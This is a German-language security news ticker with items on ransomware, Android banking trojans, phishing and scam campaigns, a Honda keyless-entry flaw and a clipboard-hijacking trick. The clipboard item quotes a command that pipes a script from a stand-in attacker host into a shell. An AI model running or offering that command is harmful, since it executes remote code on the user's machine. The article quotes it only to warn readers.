Den Forschenden gelang es, das Hochfrequenzsignal zum verschliessen des Autos abzufangen und zu manipulieren. Mit dem abgeänderten Signal gelang es ihnen, das Auto wieder aufzuschliessen. Auch den Motor könne ein Hacker angeblich aus der Ferne starten. Hierzu wurden allerdings noch keine technischen Details oder ein Code als Machbarkeitsnachweis veröffentlicht. 

Die Schwachstelle betreffe vor allem die Honda-Civic-Modelle LX, EX, EX-L, Touring, Si und Type R mit den Baujahren 2016 bis 2020. Auf Anfrage von Bleepingcomputer teilte Honda mit, dass der Hersteller keine Pläne habe, die Schwachstelle in älteren Modellen zu schliessen. 

Kein Upgrade für ältere Modelle

Gemäss Honda verwenden mehrere Autohersteller Legacy-Technologien für die Fernverriegelungsfunktion und sind damit möglicherweise anfällig für "entschlossene und technisch sehr versierte Diebe", wie es in dem Bericht heisst. Ausserdem gebe es keine Hinweise darauf, dass diese Methode weit verbreitet ist - ein Dieb könne auch andere Mittel nutzen, um sich Zugang zu verschaffen. 

Die Sicherheitsforschenden empfehlen dem Hersteller, auf Rolling-Codes zu wechseln. Basierend auf einem gemeinsamen Secret wird zwischen Sender und Empfänger ein sich stets ändernder Code zur Überprüfung übermittelt. Im Januar hatte ein anderer Sicherheitsforscher jedoch eine andere, sehr ähnliche Schwachstelle gefunden. Diese betraf die Honda-Civic-Modelle mit Baujahr 2012. Da das betroffene System Rolling-Codes einsetze, sei die Attacke deutlich weniger effektiv.

22.03.2022 - 14:13 Uhr

Neue Ransomware verleiht Drohung mit Wiper-Feature mehr Druck

Die Sicherheitsexperten von Blackberry warnen vor einer Ransomware mit einem fiesen neuen Feature. Es geht um die relativ neue Malware-Familie Lokilocker – benannt nach der hinterlistigen, schelmischen Figur aus der nordischen Mythologie (oder den Marvel-Filmen). 

Die Ransomware wird as-a-Service angeboten. Die cyberkriminellen Entwickler setzen also auf eine Gruppe von Partnerunternehmen, die das Schadprogramm nutzen, um Opfer zu erpressen. Im Gegenzug erhalten die Entwickler wohl eine Provision von den erhaltenen Lösegeldern. Gemäss Blackberry handelt es sich bei Lokilocker um eine sehr exklusive Gruppe von vermutlich nur etwa 30 Partnern. 

Wenn die Ransomware einen Rechner infiziert und sämtliche Daten verschlüsselt, startet auch ein Countdown: Das Opfer hat nur bis zum Ende der Frist Zeit, das Lösegeld zu überweisen. Damit die infizierten Opfer möglichst motiviert sind, zu zahlen, setzt Lokilocker einen neuen Trick ein: Es verfügt über einen integrierten Wiper. Dieser soll dafür sorgen, dass die Daten unmöglich wiederherzustellen sind – sofern die Opfer kein Backup davon gemacht haben. 

Der Wiper löscht alle Dateien auf allen Laufwerken eines betroffenen Systems – mit Ausnahme der Systemdateien. "Ausserdem versucht das Schadprogramm, den Master Boot Record (MBR) des Systemlaufwerks zu überschreiben, um das System unbrauchbar zu machen", schreibt Blackberry. Die Opfer würden dann nur noch von dieser Nachricht begrüsst werden: "You did not pay us. So we deleted all your files :)". 

Übrigens: Wiper-Schadprogramme kommen auch im Cyberkrieg in der Ukraine zum Einsatz. Wie gross das Risiko ausserhalb der Ukraine ist und wie man sich schützt, erklärt Thomas Uhlemann von Eset an dieser Stelle.

Vermutlich iranisch – vielleicht aber auch nicht
Woher die Malware kommt, wird noch diskutiert. Ein möglicher Kandidat ist Iran. Die eingebetteten Debugging-Strings sind alle auf Englisch. Die typischen Schreibfehler, die man von russischen und chinesischen Entwicklern kennt, fehlen weitgehend, wie Blackberry erklärt. 

Ferner verwenden manche Partner Benutzernamen, die auch in iranischen Hackerforen auftauchen. Einige der Cracking-Tools, die zur Verbreitung der ersten LokiLocker-Samples verwendet wurden, könnten von einem iranischen Cracking-Team namens AccountCrack entwickelt worden sein. 

Ferner verfügt die Ransomware auch über eine Liste von Ländern, in denen sie nicht aktiv werden soll. Das einzige Land auf der Liste: Iran. Allerdings wurde dieses Feature wohl (noch) nicht vollständig implementiert. Blackberry weist darauf hin, dass all diese Hinweise auch bewusst auf eine falsche Fährte locken könnten.

Das Schadprogramm wurde in .NET geschrieben. Es verwendet AES-Verschlüsselung, um die Dateien zu sperren und RSA, um den Entschlüsselungscode zu schützen. 

 

07.03.2022 - 11:54 Uhr

Sharkbot: Ein fieser Hai schwimmt durch vermeintlich friedliche Gewässer

Wer ein internetfähiges Gerät nutzt, muss dieses schützen – auch Smartphones. Das wird stets deutlicher und dessen wird sich die breite Bevölkerung auch zunehmend bewusster. Glücklicherweise gibt es im offiziellen Google Play Store für Android-Handys zahlreiche kostenlose Antivirus-Angebote für die Sicherheitsbewussten mit kleinen Budgets. Wie beispielsweise die App "Antivirus, Super Cleaner". 

Weshalb sollte man die App auch nicht herunterladen? Gemäss der Beschreibung bietet die App Echtzeit-Schutz rund um die Uhr, einen Viren-Scanner und auch noch einen Cleaner, der das Handy von unerwünschten Daten bereinigt. Und das alles kostenlos.

Zwar gibt es tatsächlich kostenfreie Antivirenlösungen für Handys – diese App gehört allerdings nicht dazu. Denn es handelt sich um einen Wolf im Schafspelz – beziehungsweise um einen Hai im Antivirus-Pelz. Wer die App installiert, infiziert sein Gerät mit dem Banking-Trojaner Sharkbot, wie die auf Informationssicherheit spezialisierte NCC Group mitteilt. 

Ein getarnter und fortschrittlicher Banking-Trojaner

Wie das Unternehmen mit Sitz in Manchester schreibt, handelt es sich um ein sehr fortschrittliches Schadprogramm, das relativ neue Features ausnutzt (wie etwa Direct Reply Notifications). Ein Alleinstellungsmerkmal des Banking Trojaners ist, dass es Gelder mittels dem Automatic Transfer Service (ATS) überweisen kann. ATS ist eine Bankdienstleistung, die automatisch Gelder zwischen den verschiedenen Konten einer Person verschiebt. 

Sharkbot fokussiert sich darauf, Zugangsdaten zu Banking-Applikationen zu stehlen. Dazu kann es User-Interaktionen vortäuschen, gefälschte Log-in-Screens einblenden (sobald eine Banking-App gestartet wird), SMS abfangen und eingegebene Daten mitlesen. Indem es die Funktionen für die Barrierefreiheit ausnutzt, kann es auch die komplette Kontrolle über ein Gerät erlangen. 

Ein Screenshot der vermeintlichen Antivirus-Applikation im Play Store. (Source: Screenshot)

Hinter dieser vermeintlichen Antivirus-Applikation im Play Store verbirgt sich der Banking-Trojaner Sharkbot. (Source: Screenshot)

Der Funktionsumfang geht aber noch weiter: Sharkbot kann auch neue Befehle direkt von seinem Kontroll-Server erhalten. Auf Anweisung des C2-Servers kann es etwa bestimmte Apps deaktivieren und deinstallieren sowie zusätzliche Applikationen herunterladen. Auf diese Weise infiziert die App Smartphones. Im Play Store lädt man nur einen Dropper herunter – Sharkbot Light sozusagen. Diese installiert anschliessend das volle Schadprogramm. 

Sharkbot zeigt, dass man auch bei Downloads in den offiziellen App-Stores auf der Hut sein muss. Es empfiehlt sich, keine Applikationen von unbekannten Anbietern herunterzuladen. Insbesondere wenn sie keine Bewertungen und kaum Downloads vorweisen können. Als dieser Beitrag geschrieben wurde, war die App im Play Store noch erhältlich. Gemäss dem Store wurde sie bereits rund 1000 Mal heruntergeladen. 

Update vom 08.03.2022: Google hat die schädliche App aus dem Play Store entfernt. Sie erscheint nicht mehr in den Suchergebnissen.

28.02.2022 - 15:04 Uhr

Kein Grund zur Freude: Berüchtigte Malware Trickbot wird eingestampft

Das Schadprogramm Trickbot hat in den vergangenen Jahren die IT-Bedrohungslandschaft stark geprägt. Zunächst als Banking-Trojaner entwickelt, wuchs die Malware in den vergangenen Jahren über ihre ursprüngliche Programmierung hinaus. So kann Trickbot etwa auch Passwörter, Browsercookies, OpenSSH-Privatschlüssel und Konfigurationsdateien von OpenVPN stehlen. Seit Anfang 2019 können andere Cyberkriminelle gegen Bezahlung auch Zugriff auf durch Trickbot infizierte Rechner erwerben. Trickbot war unter anderem für den Cyberangriff auf die Hirslanden-Gruppe vergangenen November verantwortlich, wie Sie hier nachlesen können.

Nun wurde Trickbot jedoch eingestellt durch die Betreiber, wie "Bleepingcomputer" berichtet. Das Nachrichtenportal beziehe sich auf interne Dokumente, die es vom Cybersecurity-Unternehmen AdvIntel und dessen CEO Vitali Kremez erhalten habe. Demnach wurde die komplette Infrastruktur hinter Trickbot heruntergefahren. Die Distribution des Schadprogramms wurde bereits vergangenen Dezember eingestellt.

Dies ist jedoch keineswegs eine erfreuliche Nachricht für Cybersecurity-Verantwortliche. Denn die Stilllegung hat wohl nichts mit den Aktivitäten der Strafverfolgungsbehörden zu tun. Stattdessen wechselten die Hauptentwickler von Trickbot schlicht zu einem neuen Projekt. Sie arbeiten nun für die Ransomware-Gruppierung Conti. 

Unter dem Conti-Banner sollen die Trickbot-Entwickler an neuen Schadprogrammen arbeiten – insbesondere die Malware-Familien Bazarbackdoor und Anchor. Beide setzen stark auf Tarnung bei der Infektion von Rechnern. Daher auch die Umverteilung der Ressourcen. Denn die Trickbot-Malware sei mittlerweile zu einfach zu erkennen. 

Die Verbreitung der Bazarbackdoor nahm in den vergangenen sechs Monaten bereits zu. Und es ist wahrscheinlich, dass dies nur der Anfang ist. 

28.02.2022 - 14:49 Uhr

Mehr zum Cyberkrieg in der Ukraine

Russische Truppen sind in die Ukraine einmarschiert. Unterhalb der martialischen Oberfläche dieses Konflikts brodelt auch ein Krieg mit Cyberwaffen. Die aktuellen Meldungen zu den IT-Aspekten des Konflikts in Osteuropa finden Sie hier im Web-Dossier zum Cyberkrieg in der Ukraine.

21.02.2022 - 15:35 Uhr

Banking-Trojaner Medusa findet neue Wege ans Ziel

Medusa – auch bekannt als Tanglebot – ist kein neuer Player in der Malware-Welt. Der vielseitige Banking-Trojaner für Android-Geräte nimmt derzeit allerdings Fahrt auf. Auffällig dabei: Der Schädling breitet sich in neuen Regionen aus. Dank eines neuen Vertriebsnetzwerks befällt Medusa nun auch Opfer in Europa und Nordamerika, wie der niederländische Anbieter von Betrugserkennungslösungen Threatfabric mitteilt. Dafür greift die Malware auf einen Kollegen zurück. Gemäss Threatfabric nutzt Medusa nun das Verteilnetzwerk des berüchtigten Android-Trojaners Flubot.

Die Malware infiziert über SMS-Phishing-Kampagnen Handys. Die Opfer erhalten eine SMS mit einem Link. Wer draufklickt, kann nachher eine vermeintlich legitime App herunterladen – die Malware muss händisch installiert werden. Häufig gibt Medusa vor, eine App von DHL zu sein. Ferner maskiert sich die Malware auch gerne als Android-Update, Flash-Player oder als eine Amazon-App. Der Banking-Trojaner kann jedes Eingabefeld einer laufenden Banking-App auf einem infizierten Gerät bearbeiten. So kann Medusa mittels gefälschten Login-Formulardaten die Zugangsdaten von nahezu jeder Banking-Plattform stehlen. Ferner kann der Schädling auch Audio und Video streamen sowie beliebige Befehle ausführen.

Schadprogramme wie Medusa zeigen, wieso man immer misstrauisch sein sollte, wenn man einen Link per SMS erhält. Auch wenn der Link von einem bekannten Kontakt kommt. Das Handy dieser Person könnte bereits infiziert sein und deshalb den Link verschicken.

21.02.2022 - 14:25 Uhr

Roaming Mantis nimmt Europa ins Visier

Die als Roaming Mantis bezeichnete SMS-Phishing-Kampagne hat Europa erreicht. Die Kampagne ist seit mindestens vier Jahren aktiv. Sie fiel erstmals 2018 auf, als sie es auf Handy-Nutzer und -Nutzerinnen in Japan abgesehen hatte. Seitdem kamen immer mehr Länder hinzu. Seit Kurzem zählen auch Frankreich und Deutschland zum Einzugsgebiet von Roaming Mantis, wie Kaspersky mitteilt.

Die Infektion beginnt mit einer harmlos scheinenden SMS – ein Paket soll geliefert werden. Die SMS enthält auch einen Link, die zu einer Downloadseite führt. Dabei handelt es sich teilweise um authentische, aber kompromittierte Websites. Statt einer legitimen App, laden die Opfer aber einen Trojaner namens Wroba herunter. Dieser versucht anschliessend, Zugangsdaten für Banken-Apps zu erhaschen. 

Wer ein iOS-Gerät besitzt, ist deswegen nicht sicher vor Roaming Mantis. Öffnet man den Link auf einem iPhone, wird man ebenfalls zu einer Phishing-Seite weitergeleitet. Diese versucht allerdings mit einem gefälschten Login-Screen, die Zugangsinformationen zum Apple-Konto zu ergaunern. 

Die jüngste Version des Trojaners hat zudem einen neuen Trick gelernt. Sie kann auf die Bildergalerie zugreifen und so Fotos oder Videos stehlen. Gemäss Kaspersky könnten die Cyberkriminellen mit den gestohlenen Fotos etwa die Identität der Opfer missbrauchen oder diese erpressen, wenn es sich um sensibles Bildmaterial handelt.

14.02.2022 - 15:48 Uhr

Maze, Egregor und Sekhmet: Ransomware-Entwickler hängen Hut an den Nagel

Opfer der Maze-, Egregor- oder Sekhmet-Ransomware können aufatmen. Ein Nutzer, der sich selbst "Topleaks" nennt, veröffentlichte die Decryption Keys für die drei Erpresserprogramme auf dem Forum des Newsportals "Bleepingcomputer", wie dieses berichtet

"Topleaks" ist nach eigenen Angaben der Entwickler hinter den drei Ransomware-Schadprogrammen. Die Enschlüsselungscodes wurden laut dem Forumseintrag planmässig veröffentlicht. Dies sei keine Reaktion auf kürzlich durchgeführte Polizeiaktionen, bei denen Server beschlagnahmt und Ransomware-Betreiber verhaftet wurden. 

Ferner schrieb "Topleaks", dass kein Mitglied seines Teams jemals wieder mit Ransomware arbeiten werde. Den Quellcode der Erpresserprogramme hätten sie bereits vernichtet.

Was genau veröffentlicht wurde

Im Forumseintrag war auch eine 7zip-Datei. Diese beinhaltet vier Archive, in denen wiederum die Decryption Keys für Maze, Egregor und Sekhmet zu finden sind. Die Archive enthalten jeweils den Public Master Encryption Key sowie den Private Master Decryption Key. Mit den Decryption Keys lassen sich die verschlüsselten, individuellen Codes der Opfer entschlüsseln.

Michael Gillespie und Fabian Wosar von Emisoft bestätigten gegenüber "Bleepingcomputer", dass die Codes echt sind und funktionieren. Wer durch diese Ransomware-Varianten verschlüsselte Dateien hat, kann diese mit den Codes also wieder freigeben. 

Der Forumseintrag mit dem Leak auf "Bleepingcomputer".

Der Forumseintrag mit dem Leak auf "Bleepingcomputer". (Source: Bleepingcomputer)

Emisoft veröffentlichte ein kostenloses Entschlüsselungstool für Maze-, Egregor- und Sekhment-Opfer. Damit das Tool funktionieren kann, benötigt man den Erpresserbrief, der während der Attacke generiert wurde. Dieser enthält nämlich den individuellen Entschlüsselungscode. 

Als Bonus - wie "Topleaks" schreibt - enthalten die Archive auch den Source Code für die von der Gruppe entwickelte Moyv-Malware. Das Schadprogramm wurde genutzt, um Dateien zu infizieren und sich auf anderen Systemen zu verbreiten.

Seit fast 3 Jahren aktiv

Die Ransomware Maze ist seit Mai 2019 aktiv. Die Gruppierung soll für die doppelte Erpressungstaktik verantwortlich sein, die heute zum Standardrepertoire gehört: Die Daten werden verschlüsselt und gestohlen, um den Druck auf die Opfer zu erhöhen. Sollten die Opfer nicht zahlen, drohen die Erpresser damit, die sensiblen Daten zu veröffentlichen. 

 


Im Herbst 2020 stellte die Bande den Betrieb von Maze ein. Darauf folgte ein Rebranding zu Egregor. Anfang 2021 verschwand die Ransomware wieder vom Radar, nachdem einige Egregor-Partner verhaftet wurden. 

Sekhmet war wohl eher ein Nebenprojekt. Die Ransomware wurde seit März 2020 genutzt - also noch während Maze aktiv war. 

07.02.2022 - 15:35 Uhr

Betrüger ködern verängstigte Blockchain.com-User

Cyberbetrüger haben es zurzeit auf Nutzer und Nutzerinnen von Blockchain.com abgesehen. Die Website gehört zu den grössten Plattformen, um Kryptowährungen zu kaufen, aufzubewahren und zu handeln. 

Die Betrüger ködern ihre Opfer mit einer SMS. Darin steht: "We regret to inform you that your wallet has been compromised. Take action at: ch2fa-blockchain[.]com". Die Meldung, dass Konto sei gehackt worden, stimmt natürlich nicht, wie die Kantonspolizei Zürich mitteilt

Screenshot der gefälschten Blockchain.com-Website mit der Aufforderung, die Backup-Phrase einzugeben.

Screenshot der gefälschten Blockchain.com-Website mit der Aufforderung, die Backup-Phrase einzugeben. (Source: zVg)

Der in der SMS verschickte Link führt zu einer gefälschten Website, die der offiziellen ähnlich sieht. Aufgrund einer neuen Richtlinie solle man die Backup-Phrase des eigenen Kryptowährungskontos bestätigen, heisst es dort.

Glaubt man dieser Meldung, wird sie zu einer selbsterfüllende Prophezeiung: Das Opfer gibt die Daten für seine Wallet an und die Cyberkriminellen können damit anschliessend das Konto plündern. 

Die Kantonspolizei empfiehlt, nicht auf den Link zu klicken, die Wallet IT nicht einzugeben und niemals die Backup-Phrase auf dubiosen Websites einzugeben. Wer dies allerdings schon gemacht hat, solle sich so schnell wie möglich bei Blockchain.com melden. Wurde das Konto bereits geleert, solle man Anzeige bei einer lokalen Polizeistation erstatten.
 

31.01.2022 - 13:01 Uhr

Fürchtet die NASA, wenn sie Geschenke bringt

Es wäre doch eigentlich schön, wenn es funktionieren würde: Man zahlt einen gewissen Betrag auf eine Cryptowallet-Adresse ein und später erhält man den doppelten Betrag zurück. Leider steckt hinter solchen Angeboten wohl immer ein Cyberkrimineller, der sich ins Fäustchen lacht. Wer Geld investiert, sieht dieses nie wieder. 

So auch bei diesem aktuellen Betrugsversuch, vor dem das Nationale Zentrum für Cybersicherheit (NCSC) zurzeit warnt. Um etwas vertrauenswürdiger zu wirken, geben die Betrüger respektive Betrügerinnen vor, das Angebot stamme von der US-amerikanischen Raumfahrtsbehörde NASA. So missbrauchen sie auch den Namen des ehemaligen Astronauten Bill Nelson für ihre Machenschaften. 

Nelson flog 1986 mit dem Spaceshuttle Columbia ins All und half dabei, einen Kommunikationssatelliten in seine Umlaufbahn zu bringen. Seit Mai 2021 ist der US-amerikanische Politiker Administrator der NASA.  

Bill Nelson in seinen Tagen als Astronaut bei der NASA.

Bill Nelson in seinen Tagen als Astronaut bei der NASA. (Source: Wikimedia Commons)

 

Nicht nur die NASA wird in den Schmutz gezogen

Laut dem NCSC kursieren zurzeit auch weitere derartige Scam-Angebote. So verspreche auch Elon Musk, Geldsummen zu verdoppeln. Solche Angebote haben oft einen Countdown. Dieser zeigt an, wie lange das Angebot noch gilt, um potenzielle Opfer unter Druck zu setzen. Denn unter Druck ist man eher geneigt, übereilt zu handeln. 

Das NCSC rät, solche Aktionen zu ignorieren und sich nicht unter Druck setzen zu lassen. Je grösser die versprochene Rendite ist, desto grösser ist in der Regel auch das Risiko, heisst es in der Mitteilung. 

Diese Warnung ist Teil des aktuellen Wochenrückblicks des NCSC. Auch in der vergangenen Woche erhielt das NCSC mehr Meldungen als üblich. Über ein Drittel der Meldungen betreffen einen Erpressungsversuch im Namen verschiedener Strafverfolgungsbehörden. Für diese Spam-E-Mail nutzen Cyberkriminelle unter anderem die Logos von Fedpol und Europol, wie Sie hier nachlesen können

Sie sieht das Fake-Angebot der Betrüger aus: Ein grosses NASA-Logo und darunter kann man Bitcoin oder Ethereum auswählen.

Das Fake-Angebot der Betrüger: Die Opfer können sogar auswählen, ob sie den Cyberkriminellen Ethereum oder Bitcoin geben wollen. (Source: NCSC)

17.01.2022 - 13:03 Uhr

Das IoT macht Linux attraktiver für Malware-Entwickler

Das Internet der Dinge (IoT) breitet sich stetig aus. Bis 2025 soll die Anzahl mit dem Internet verbundener Geräte auf 30 Milliarden steigen. Die meisten dieser smarten Geräte setzen eine Linux-Distribution ein – und sind nur mangelhaft geschützt. 

Das macht die Open-Source-Betriebssysteme allerdings für Cyberkriminelle zunehmend interessanter: 2021 stieg die Anzahl Malware-Bedrohungen für Linux-Systeme um 35 Prozent im Vergleich zum Vorjahr, wie der Cybersecurity-Anbieter Crowdstrike mitteilt. 

Für Botnets und Schlimmeres

Die meisten Linux-Schadprogramme sollen IoT-Geräte kapern und zu einem Botnet zusammenschliessen. Derartige Netzwerke können massive DDoS-Attacken lancieren, um Websites oder ganze Web-Services lahmzulegen. 

Ferner nutzen Cyberkriminelle die IoT-Geräte auch, um Kryptowährungen zu schürfen, Spam-Kampagnen zu verschicken oder als Command-and-Control-Server. Unternehmen sollten besonders aufpassen, wenn sie IoT-Geräte in ihrem Firmennetzwerk verwenden. Sie können nämlich auch als Einstiegspunkte in diese Netzwerke dienen.

Die drei am weitesten verbreiteten Malware-Familien mit Appetit für Linux-Systeme waren XorDDoS, Mirai, and Mozi. Zusammen machten sie etwa 22 Prozent aller Linux-Bedrohung aus. 

  • Die Verbreitung von Mozi verzehnfachte sich in 2021. Das P2P-Botnet ist seit über 2 Jahren aktiv. Die Liste der Schwachstellen, die es ausnutzen kann wird entsprechend stets länger. 
  • XorDDos ist ein vielseitiger Linux-Trojaner, der auf verschiedenen Linux-System-Architekturen läuft – von ARM-basierten IoT-Geräten bis zu x64-Servern. Im Vergleich zum Vorjahr nahm die Anzahl gefundener XorDDos-Proben um 123 Prozent zu. 
  • Mirai ist bereits ein alter Hase in der Malware-Welt. Die Malware machte Ende 2016 auf sich aufmerksam: Das Schadprogramm war damals für die erste DDoS-Attacke mit einer Stärke von über 1 Terabit pro Sekunde verantwortlich. Da der Quellcode Open Source ist, brachte Mirai unterdessen zahlreiche Ableger hervor. 

Alle wachsen, aber Windows-Malware bleibt an der Spitze

Bereits in 2020 stieg die Anzahl Malware-Bedrohungen stark an. Damals fiel insbesondere die Zunahme an MacOS-Malware auf, wie Sie hier nachlesen können. Im Schnitt entwickelten Cyberkriminelle jeden Tag 1847 neue Schadprogramme für die Apple-Produkte. Dies entspricht einer Zunahme von 1000 Prozent im Jahresvergleich auf 674'273. 

Aber: Am totalen Volumen gemessen ist dies noch nicht mit den Schadprogrammen für Windows vergleichbar. Die Anzahl an Windows-Malware stieg 2020 um 2,2 Prozent im Jahresvergleich auf 91 Millionen. Dies entspricht etwa 249'452 neu entwickelten Windows-Bedrohungen pro Tag. 

Crowdstrike nannte kein absolutes Volumen in der Analyse der Linux-Malware.

10.01.2022 - 15:05 Uhr

Cyberattacken nehmen in der Schweiz überdurchschnittlich stark zu

Der pandemiebedingte Lockdown hat den Cyberkriminellen in die Hände gespielt - und tut dies auch weiterhin. Dies zeigt auch die jüngste Auswertung des israelischen IT-Security-Anbieters Check Point. 

In der Schweiz nahm die Anzahl Cyberattacken auf Firmennetzwerke in 2021 um 65 Prozent zu im Vergleich zum Vorjahr. Die Gesundheitsbranche wurde besonders gebeutelt. Mit einem Anstieg von 107 Prozent sei die Branche unter Dauerfeuer gewesen, schreibt der Sicherheitsanbieter. An zweiter und dritter Stelle kamen die Bereiche Finance/Banking mit einem Anstieg von 98 Prozent und Government/Military mit 86 Prozent.

Die Anzahl Cyberattacken legte in der Schweiz überdurchschnittlich stark zu. Global stiegen die Attacken auf Firmennetzwerke nämlich um 50 Prozent. Österreich traf es allerdings noch viel härter. Gemäss Check Point legten die Cyberangriffe im Nachbarland um 117 Prozent zu. Die Entwicklung in Deutschland war vergleichbar mit derjenigen in der Schweiz – wenn auch leicht schwächer. 

"Die Zahl der Cyberangriffe erreichte gegen Ende des Jahres ihren Höhepunkt, was vor allem auf die Versuche zurückzuführen ist, die Sicherheitslücke Log4j auszunutzen", sagt Omer Dembinsky, Data Research Manager bei Check Point. Mehr zur Log4j-Schwachstelle können Sie hier lesen.

Dembinsky geht davon aus, dass diese Zahlen 2022 steigen werden. "Ich empfehle der Öffentlichkeit, insbesondere im Bildungs-, Regierungs- und Gesundheitssektor, sich mit den Grundlagen des eigenen IT-Schutzes vertraut zu machen", sagt er. Patches einzuspielen, Netzwerke zu segmentieren und die Mitarbeitenden zu schulen, könnte diese Netzwerke bereits wesentlich sicherer machen. 

Den vollständigen Jahresvergleich von Check Point können Sie hier lesen.

03.01.2022 - 15:50 Uhr

Weshalb man seinen Code selbst schreiben statt copy-and-pasten sollte

Wer heute beim Programmieren an seine Grenzen stösst, hat die Lösung meistens schnell gefunden. Zahlreiche Websites bieten nämlich pfannenfertige Codes für fast alle Probleme an. Aber Copy-and-Pasten vom Internet kann selbst zum Problem werden, wie Gabriel Friedlander, Gründer von Wizer in seinem Blog erklärt. Das Unternehmen mit Sitz in Boston, USA bietet Security-Awareness-Trainings an.

Wer einen Text im Internet markiert und diesen kopiert, geht natürlich davon aus, dass derselbe Text wieder erscheint, wenn er oder sie das Kopierte einfügt. Aber dass muss nicht zwingend auch so sein. 

In seinem Blogbeitrag fordert Friedlander die Leserinnen und Leser dazu auf, den simplen Befehl „sudo apt update“ zu kopieren. Dieser Befehl wird genutzt, um die Paketinformationen aus allen konfigurierten Quellen herunterzuladen und zu aktualisieren. 

Beim Einfügen des kopierten Texts erscheint jedoch eine komplett andere Befehlszeile: „curl http://attacker-domain:8000/shell.sh | sh“. Die Curl-Kommandozeile wird auf Linux-Systemen genutzt, um Daten von oder zu einem Server zu übertragen. So könnte man potenziell eine Schadsoftware auf einen Rechner laden. 

Was das Ganze noch schlimmer macht: Die eingefügte Befehlszeile fügt automatisch eine neue Zeile hinzu. Fügt man dies also in einem Terminal ein, wird der Befehl automatisch ausgeführt. Das Opfer merkt es also erst, wenn es bereits zu spät ist. 

Wieso wird nicht kopiert, was kopiert werden sollte? Die Antwort ist ein simples Javascript im Code der Website. Sobald der „sudo apt update“-Text kopiert wird, wird das Javascript ausgeführt. Der kopierte Text in der Zwischenablage wird anschliessend automatisch durch den im Script definierten Befehl ersetzt.

Diese Angriffsmethode ist enorm simpel – aber auch sehr gefährlich. Programmierer könnten so etwa unwissentlich Hintertüren in ihre Applikationen einbauen. Allerdings kann eine derartige Attacke nicht zielgerichtet ausgeführt werden. Ein Cyberkrimineller kann ja nicht steuern, was für eine Codezeile ein bestimmter Programmierer nicht selbst schreiben kann und daher im Internet sucht. 

Friedlander empfiehlt trotzdem, keinen Code aus dem Internet zu kopieren. Alternativ solle man ein Rautesymbol (#) davor setzen. Dieser wandle den ausführbaren Befehl nämlich in einen Kommentar um. Ferner könnten gewisse Terminals auch so eingestellt werden, dass sie nicht automatisch eine neue Zeile generieren und somit einen Befehl ausführen, wenn das entsprechende Symbol eingefügt wird.

15.11.2021 - 14:02 Uhr

Checkbetrüger ködern Schweizer Anwaltskanzleien

Gewisse Cyberkriminelle nehmen zurzeit Schweizer Anwaltskanzleien ins Visier mit einer Variation des CEO-Betrugs. Die Kanzleien erhalten eine Anfrage, die angeblich von einem CEO einer ausländischen Firma stammt. Die Firma existiert tatsächlich. 

Bei der Anfrage geht es darum, einen Vertrag zwischen der ausländischen Firma und einem Schweizer Start-up zu prüfen. Auch das Start-up gibt es wirklich. Was es aber nicht gibt, ist die in dem mehrseitigen Vertrag beschriebene Kooperation zwischen den beiden Unternehmen zwecks einer Lizenzierung eines Patents. Der Vertrag trägt die Unterschrift der CEOs beider Firmen – beide gefälscht. 

Die Betrüger geben vor, dass sie die Kanzlei beauftragen wollen. Sie solle den auf Englisch verfassten Vertrag gemäss geltendem Schweizer Recht prüfen. Konkret gehe es um eine Interessenkollisionsprüfung zwecks Übernahme eines Mandates. 

Der eigentliche Betrug

Nachdem die Betrüger sich nach den Gebühren für so eine Prüfung erkundigt haben, wird ein Check oder eine Banküberweisung in Aussicht gestellt. Gefälschte Belege von ausländischen Banken sollen dies belegen. 

"Dummerweise" wurde jedoch ein viel zu hoher Betrag überwiesen. Die Anwaltskanzlei solle doch den Überschuss an eine andere Firma überweisen. Kommt sie der Bitte nach, ist das Geld weg. Denn die angebliche Überweisung folgt natürlich nie. 

Die Warnung kommt von Cybercrimepolice.ch – einem Portal der Kantonspolizei Zürich. Diese empfiehlt daher, vor einer Überweisung stets die beteiligten Firmen zu kontaktieren – und zwar nicht über die in der E-Mail mitgeschickte Kontaktnummer! Ausserdem solle man kein Geld überweisen, das man noch nicht wirklich erhalten hat. Wer bereits auf diese Weise betrogen wurde, solle bei der lokalen Polizeistation eine Strafanzeige erstatten.

09.11.2021 - 15:45 Uhr

Böse Miezekatze: HelloKitty unterstreicht Ransomware-Attacken neu mit DDoS-Angriffen 

Die noch relativ junge Ransomware-Gruppierung HelloKitty – keine Verbindung zu der sehr viel harmloseren Marke – fährt ihre Krallen aus. Bislang infizierte die Gruppe Unternehmen mit Ransomware und erpresste die Opfer anschliessend. Um der Forderung mehr Druck zu verleihen, stiehlt HelloKitty auch Daten. Zahlt das Opfer kein Lösegeld, werden die sensiblen Daten veröffentlicht. 

Da dies wohl nicht reicht, setzt HelloKitty nun noch einen drauf. In einigen Fällen, in denen die Opfer nicht reagierten oder nicht zahlen wollten, lancierte die Gruppe eine DDoS-Attacke. Mit dieser wurde die Website des Opfers lahmgelegt, was zusätzlichen Druck auf das Unternehmen ausüben soll, wie FBI und CISA warnen. 

Die Gruppe ist seit November 2020 aktiv. Dem FBI fiel sie erstmals im Januar 2021 auf. Ihren grössten Coup landete HelloKitty wohl im Februar. Damals infizierte sie CD Projekt Red, den polnischen Entwickler von Cyberpunk 2077 und der Witcher-Videospielreihe. Damals erbeutete die Gruppe nach eigenen Angaben den Quellcode verschiedener Games. (Lesen Sie mehr dazu im Blogbeitrag vom 15.02.2021: "Cyberpunk-Entwickler CD Projekt Red gleich dreifach gebeutelt")

Um in die Netzwerke ihrer Opfer einzudringen, nutzt Hello Kitty kompromittierte Zugangsdaten sowie kritische Schwachstellen in Sonicwall-Lösungen, die erst vor kurzem gepatcht wurden. Dazu zählen etwa CVE-2021-20016, CVE-2021-20021, CVE-2021- 20022, CVE-2021-20023).

HelloKitty verlangt von ihren Opfern eine Lösegeldzahlung in Bitcoin. Die Höhe scheint jeweils auf die finanziellen Möglichkeiten des angegriffenen Unternehmens angepasst zu sein. Online hat das FBI eine ausführliche Warnung mit einer umfassenden Liste der Indicators of Compromise (IOCs).
 

01.11.2021 - 14:14 Uhr

Microsoft hackt Apple: Schwachstelle in MacOS gefunden

Ende Oktober hat Apple eine Schwachstelle in seinem Betriebssystem MacOS behoben. Eine ernste Sicherheitslücke, die es einem Angreifer ermöglichen könnte, beliebige Befehle auszuführen und Root-Rechte zu erlangen. Selber gefunden hatte der kalifornische Hersteller die Schwachstelle allerdings nicht; auch waren es keine unabhängigen IT-Security-Firmen. Nein, ausgerechnet Microsoft machte Apple darauf aufmerksam

